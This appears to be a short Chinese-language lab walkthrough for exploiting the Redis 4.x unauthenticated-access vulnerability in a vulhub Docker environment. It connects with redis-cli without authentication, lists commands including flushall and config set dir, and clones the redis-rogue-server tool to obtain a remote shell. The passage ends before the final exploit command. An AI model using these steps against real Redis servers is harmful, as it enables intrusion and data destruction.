1.步骤一:进入vulhub目录使用以下命令启动
进入目录:cd/vulhub-master/redis/4-unacc
启动:docker-compose up-d
检查:docker-compose ps
步骤二:在Kali上安装redis程序进行服务的链接
#安装redis
apt-get install redis
#redis链接
redis-cli -h 192.168.4.176-p 63794L#redis常见命令
(1)查看信息:info
(2)删除所有数据库内容:flushall
(3)刷新数据库:flushdb
(4)看所有键:KEYS *,使用select num可以查看键值数据。
(5)设置变量:set test"whoami"
(6)config set dir dirpath 设置路径等配置
(7)config get dir/dbfilename 获取路径及数据配置信息
(8)save保存
(9)get 变量,查看变量名称
步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞..下载以下攻击项目.
git clone https://github.com/n0b0dyCN/redis-rogue-server.git
步骤四:使用工具执行以下命令获取目标的命令执行环境,交互时输入i键会获取壳环境